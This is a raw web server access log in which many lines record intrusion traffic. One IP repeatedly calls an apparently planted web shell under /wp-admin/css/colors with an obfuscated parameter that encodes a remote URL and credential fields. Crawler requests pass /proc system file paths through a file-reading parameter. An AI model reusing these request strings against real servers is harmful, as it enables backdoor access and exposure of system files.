103.7.226.137 - - [05/Nov/2025:20:54:22 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335343436322p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335303836322q6233353961393031353264653836353238626432376265653233616231353032222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:20:56:27 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_mem&path=//proc/sys/net/ipv4 HTTP/2" 200 2517 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:56:31 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_tw_reuse&path=//proc/sys/net/ipv4 HTTP/2" 200 2502 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:56:33 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_ecn&path=//proc/sys/net/ipv4 HTTP/2" 200 2499 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:56:36 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_congestion_control&path=//proc/sys/net/ipv4 HTTP/2" 200 2515 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:56:43 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/ipfrag_time&path=//proc/sys/net/ipv4 HTTP/2" 200 2503 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:20:54:44 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335343438342p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335303838342q3565373935303837336134343464306331376339393361303665633930616164222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:20:56:47 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv6/anycast_src_echo_reply&path=//proc/sys/net/ipv6 HTTP/2" 200 2512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:56:51 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/cipso_cache_enable&path=//proc/sys/net/ipv4 HTTP/2" 200 2456 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:56:53 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/netfilter/nf_conntrack_dccp_timeout_timewait&path=//proc/sys/net/netfilter HTTP/2" 200 2529 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:57:01 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_syncookies&path=//proc/sys/net/ipv4 HTTP/2" 200 2503 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:57:04 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_keepalive_intvl&path=//proc/sys/net/ipv4 HTTP/2" 200 2511 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:20:55:06 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335343530362p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335303930362q3161373430643832316532363034666162636239623361323063616466636331222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:20:57:07 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/inet_peer_minttl&path=//proc/sys/net/ipv4 HTTP/2" 200 2506 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:57:13 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/inet_peer_threshold&path=//proc/sys/net/ipv4 HTTP/2" 200 2512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:57:17 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/icmp_ratelimit&path=//proc/sys/net/ipv4 HTTP/2" 200 2507 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:57:20 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/ip_nonlocal_bind&path=//proc/sys/net/ipv4 HTTP/2" 200 2505 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:57:23 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_notsent_lowat&path=//proc/sys/net/ipv4 HTTP/2" 200 2509 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.71.5 - - [05/Nov/2025:20:57:23 +0700] "GET /shopbrand52373206?kg=0052259562 HTTP/1.1" 200 24832 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.7.226.137 - - [05/Nov/2025:20:55:29 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335343532392p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335303932392q3235653434623139623864393532666434653238666130376566623931643964222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:20:57:30 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_early_retrans&path=//proc/sys/net/ipv4 HTTP/2" 200 2505 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:57:34 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_keepalive_probes&path=//proc/sys/net/ipv4 HTTP/2" 200 2510 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:57:38 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_retrans_collapse&path=//proc/sys/net/ipv4 HTTP/2" 200 2504 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:57:44 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_orphan_retries&path=//proc/sys/net/ipv4 HTTP/2" 200 2506 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:57:48 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_timestamps&path=//proc/sys/net/ipv4 HTTP/2" 200 2450 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.167.144.186 - - [05/Nov/2025:20:57:48 +0700] "GET /shopbrand1061500383?kg=1059188206 HTTP/2" 200 25171 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.128 - - [05/Nov/2025:20:57:51 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_reordering&path=//proc/sys/net/ipv4 HTTP/2" 200 2503 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:20:55:52 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335343535322p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335303935322q6362613535333234396531353462376536326230636262306532326432323764222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:20:57:55 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_synack_retries&path=//proc/sys/net/ipv4 HTTP/2" 200 2507 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:58:01 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_dsack&path=//proc/sys/net/ipv4 HTTP/2" 200 2500 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:58:06 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/ip_forward&path=//proc/sys/net/ipv4 HTTP/2" 200 2502 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:58:12 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_fastopen_key&path=//proc/sys/net/ipv4 HTTP/2" 200 2455 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:20:56:14 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335343537342p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335303937342q3766313630343665393965666637643763306561656239663831643166303131222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:20:58:15 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_syn_retries&path=//proc/sys/net/ipv4 HTTP/2" 200 2505 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:58:22 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/ip_local_port_range&path=//proc/sys/net/ipv4 HTTP/2" 200 2517 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:58:26 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_no_metrics_save&path=//proc/sys/net/ipv4 HTTP/2" 200 2509 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:58:29 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_tso_win_divisor&path=//proc/sys/net/ipv4 HTTP/2" 200 2507 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:58:35 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_wmem&path=//proc/sys/net/ipv4 HTTP/2" 200 2517 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:20:56:36 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335343539362p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335303939362q6531643338326662393036356564393265623736363336306634623161376534222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:20:58:38 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_tw_recycle&path=//proc/sys/net/ipv4 HTTP/2" 200 2504 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:58:45 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/core/somaxconn&path=//proc/sys/net/core HTTP/2" 200 2504 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:58:50 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_rfc1337&path=//proc/sys/net/ipv4 HTTP/2" 200 2500 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:58:54 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/udp_rmem_min&path=//proc/sys/net/ipv4 HTTP/2" 200 2507 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:58:57 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv6/ip6frag_low_thresh&path=//proc/sys/net/ipv6 HTTP/2" 200 2514 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:20:56:59 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335343631392p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313031392q3463393136306339383861343365326137616339343866316436306366376666222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:20:59:00 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/igmp_max_msf&path=//proc/sys/net/ipv4 HTTP/2" 200 2503 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:59:06 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/udp_wmem_min&path=//proc/sys/net/ipv4 HTTP/2" 200 2457 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:59:09 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/udp_mem&path=//proc/sys/net/ipv4 HTTP/2" 200 2518 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:59:13 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/core/message_cost&path=//proc/sys/net/core HTTP/2" 200 2500 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:59:15 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/ip_local_reserved_ports&path=//proc/sys/net/ipv4 HTTP/2" 200 2508 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:59:21 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_available_congestion_control&path=//proc/sys/net/ipv4 HTTP/2" 200 2522 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:20:57:22 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335343634322p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313034322q3036643435363264323963323635343534373732613038326562366232343333222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:20:59:24 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_limit_output_bytes&path=//proc/sys/net/ipv4 HTTP/2" 200 2516 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:59:32 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/ipfrag_secret_interval&path=//proc/sys/net/ipv4 HTTP/2" 200 2510 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:59:35 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv6/idgen_delay&path=//proc/sys/net/ipv6 HTTP/2" 200 2502 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:59:42 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv6/mld_max_msf&path=//proc/sys/net/ipv6 HTTP/2" 200 2505 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:59:45 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_autocorking&path=//proc/sys/net/ipv4 HTTP/2" 200 2503 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:20:57:45 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335343636352p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313036352q6463326633623664383438636565326433346637363263643465633232396663222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:20:59:51 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/ipfrag_low_thresh&path=//proc/sys/net/ipv4 HTTP/2" 200 2513 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:20:59:56 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/icmp_ratemask&path=//proc/sys/net/ipv4 HTTP/2" 200 2505 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:00:03 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/inet_peer_maxttl&path=//proc/sys/net/ipv4 HTTP/2" 200 2507 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:00:06 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/ping_group_range&path=//proc/sys/net/ipv4 HTTP/2" 200 2509 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:20:58:07 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335343638372p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313038372q3130636338366139313764663465623561396262643461383836636430366432222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:00:13 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_keepalive_time&path=//proc/sys/net/ipv4 HTTP/2" 200 2511 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:00:18 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv6/idgen_retries&path=//proc/sys/net/ipv6 HTTP/2" 200 2502 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:00:22 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_invalid_ratelimit&path=//proc/sys/net/ipv4 HTTP/2" 200 2512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:00:28 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/cipso_rbm_optfmt&path=//proc/sys/net/ipv4 HTTP/2" 200 2505 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:20:58:29 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335343730392p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313130392q6263313435653237313262393536613764373965643731623132636462323734222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:00:31 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv6/ip_nonlocal_bind&path=//proc/sys/net/ipv6 HTTP/2" 200 2505 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:00:39 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/ipfrag_high_thresh&path=//proc/sys/net/ipv4 HTTP/2" 200 2515 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:00:43 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_abort_on_overflow&path=//proc/sys/net/ipv4 HTTP/2" 200 2507 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:00:49 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/cipso_rbm_strictvalid&path=//proc/sys/net/ipv4 HTTP/2" 200 2509 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:20:58:51 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335343733312p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313133312q6134313036616232353635393138396365653962653366356538623032336333222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:00:53 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_max_ssthresh&path=//proc/sys/net/ipv4 HTTP/2" 200 2505 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:00:57 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_use_sg&path=//proc/sys/net/ipv4 HTTP/2" 200 2501 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:01:03 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv6/ip6frag_time&path=//proc/sys/net/ipv6 HTTP/2" 200 2504 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:01:07 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/igmp_qrv&path=//proc/sys/net/ipv4 HTTP/2" 200 2503 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
